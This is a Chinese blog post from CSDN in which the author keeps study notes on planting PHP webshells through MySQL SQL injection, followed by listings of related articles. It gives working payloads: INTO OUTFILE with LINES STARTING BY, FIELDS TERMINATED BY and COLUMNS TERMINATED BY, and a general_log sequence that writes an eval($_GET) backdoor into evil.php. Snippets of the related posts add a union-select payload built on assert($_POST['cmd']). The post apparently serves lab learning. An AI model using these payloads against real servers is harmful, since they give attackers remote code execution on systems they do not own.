其他sql注入写入webshell的方式

已于 2023-04-01 09:38:54 修改
阅读量412 收藏 3
点赞数
文章标签: sql php 数据库 web安全 网络安全
于 2023-03-31 16:04:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/faclon666/article/details/129877228
版权

(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)

1.lines starting by写入

注入原理:利用lines starting by语句进行拼接,拼接后面的webshell内容,lines starting by可以理解成以每行开始的位置添加xx语句。

注入:

 结果验证:

 2.fields terminated by写入

fields terminated by原理为在输出数据的每个字段之间插入webshell内容,所以如果select返回的只有一个字段,则写入的文件不包含webshell内容,例如下面语句

SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' FIELDS TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e

写入的文件中只包含username的值而没有webshell内容。

注入:

1' into outfile  'F:\\phpstudy\\MySQL\\data\\ws2.php'  fields terminated  by '<?php phpinfo();?>' #

结果验证:

 此处为两个字段,因而成功写入webshell。

 3.COLUMNS terminated by写入

利用COLUMNS terminated by语句进行拼接,拼接后面的webshell内容,COLUMNS terminated by可以理解为以每个字段的位置添加xx内容。

注入:

1' into outfile  'F:\\phpstudy\\MySQL\\data\\ws3.php'  columns terminated  by '<?php phpinfo();?>' #

 实验结果:

 4.利用log写入

1)新版本的MySQL设置了导出文件的路径,很难在获取Webshell过程中去修改配置文件,无法通过使用select into outfile来写入一句话。这时,我们可以通过修改MySQL的log文件来获取Webshell。

2)需要满足的条件

  • 对web目录有写权限
  • GPC关闭(GPC:是否对单引号转义)
  • 有绝对路径(读文件可以不用,写文件需要)
  • 需要能执行多行SQL语句   

3)操作如下:

show variables like '%general%';            	 # 查看配置

set global general_log = on;              		 # 开启general log模式,将所有到达MySQL Server的SQL语句记录下来。

set global general_log_file = 'D:/WWW/evil.php'; # 设置日志目录为shell地址

select '<?php eval($_GET[g]);?>'             	 # 写入shell

set global general_log=off;                  	 # 关闭general log模式

 连接本机数据库:

 

 

 4)结果验证:

参考链接:
(5条消息) SQL注入写入webshell_番茄酱料的博客-CSDN博客

 报错注入邂逅load_file&into outfile搭讪LINES - 先知社区 (aliyun.com)

 (5条消息) SQL注入写webshell_sql注入写入webshell_天猫来下凡的博客-CSDN博客

(5条消息) mysql写入一句话的方式_by x'01' lines terminated by x'0a_孤君的博客-CSDN博客

白帽~无常
关注
sql注入写入webshell
qq_39816136的博客
04-18 1873
最近的hvv热度高涨,最近也是接到了许多的面试电话联系。 所有就sql注入出现的次数比较频繁,是初级hvv的重中之重 我感觉十有八九会问到sql注入,这里就解说一下这个sql注入写入webshell
利用SQL注入植入 webshell
小白渣的博客
02-27 6388
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union ...
SQL注入得到WEBSHELL
11-15 1026
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB
SQL注入webshell上传
最新发布
aihua002的博客
08-05 343
1.高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限,所以该选项为可以=‘“”/=一个路径,不能为NULL,secure_file_priv=“” 代表文件读写没有限制,secure_file_priv=一个路径,代表只能对该路径下文件进行读写,而secure_file_priv=NULL 代表不能对文件进行读写。首先webshell上传就是利用MySQL的文件读写注入而实现,要想上传webshell就得了解文件读写注入的原理。
SQL注入写入webshell
bring_coco的博客
03-13 6037
前言 在所有常用的关系数据库管理系统中均包含内置的向服务器文件系统写文件的功能,通过这些内置的功能,我们可以将自己的webshell写目录或文件进去 写入webshell条件 1.MYSQL用secure_file_priv这个配置项来完成对数据导入导出的限制, 如果secure_file_priv=NULL,MYSQL服务会禁止导入和导出操作。 如果secure_file_priv=/tmp/,MYSQL服务只能在/tmp/目录下导入和导出 如果secure_file_priv="" ,MYSQL
SQL注入webshell
huangyongkang666的博客
03-25 2847
SQL注入webshell 1.MySQLshell 写入WebShell的几种方式 1、利用Union select 写入 需要满足的条件 对web目录有写权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,写文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
SQL注入webshell的实验
wangqiao258的博客
07-01 279
1.知道网站绝对路径2.数据库ROOT权限3.secure_file_priv不为NULL,为空或为网站路径查询mysql路径,猜测网站绝对路径查询当前用户查询secure_file_priv写入webshell测试shell
sql注入如何写入webshell
05-11
在实施 SQL 注入攻击后,如果漏洞利用成功,攻击者可以通过 SQL 注入漏洞将任意命令注入到 SQL 语句中,从而达到执行任意代码的目的。以下是一些可能的方法: 1. 利用 union select 语句:在注入点处添加 union ...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
文件上传漏洞
zhoutong2323的博客
04-06 873
Webshell是指一种利用Web漏洞获取远程操作权限的工具或脚本,Webshell通常隐藏在Web应用程序的后台目录中,攻击者通过利用一些已知的或未知的漏洞,将Webshell上传到服务器中。一旦成功部署Webshell,攻击者可以通过浏览器或专门的管理工具对服务器进行远程操控,并执行任意操作。
SQL注入写入文件方法(获取webshell
Goodric的博客
04-08 2701
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
我的WafBypass之路(SQL注入篇)
07-11
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf Bypass思维定势达到独立去挖掘waf的设计缺陷和如何实现自动化的Waf Bypass(这里只讲主流waf的黑盒测试)
web安全】——基于SQL注入拿到webshell
Demo不是emo的博客
11-20 4894
今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天写一篇博客来巩固一下这方面的知识,希望对您们也有帮助
SQL注入(4)——实战SQL注入webshell
realmels的博客
05-27 1234
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP 通过一个实例来进行SQL注入的实战。 ...
sql注入phpmyadmin日志写入webshell
weixin_54813510的博客
05-25 1828
写入webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
SQL注入写入WebshellLines terminated by写入
faclon666的博客
03-31 776
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来写入webshell。1.当mysql注入点为盲注或报错,Union select写入是不能利用的,那么可以通过分隔符写入SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)
通过sql注入漏洞读写文件获取webshell
qq_43757105的博客
10-16 4334
一、前提条件: 当前用户具有文件读写权限 知道读写文件的绝对路径 Mysql.ini设置secure_file_priv为下图所示 二、手工方式 读文件: 写文件: 首先发现注入点,可以利用注入手法进行回显 利用into outfile ‘上传文件路径+文件名’ 进行写文件操作,如下所示: http://192.168.132.139/sqli-labs-master/Less-1/?id=2' and 1=2 union s...
一次与sql注入 & webshell 的美丽“邂逅”
weixin_34218890的博客
04-27 163
引言 一波未平,一波又起。金融公司的业务实在是太引人耳目,何况我们公司的业处正处于风口之上(区块链金融),并且每天有大量现金交易,所以不知道有多少黑客躲在暗处一直在盯着你的系统,让你防不胜防,并且想方设法的找到突破点,以达到黑客的目的来获取非法利益。俗话说:“道高一尺,魔高一丈”。系统和代码也可以这么理解,防的在好,总有漏洞。系统和代码也没有绝对的安全。该来的总会来......sql注入与“她”相...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值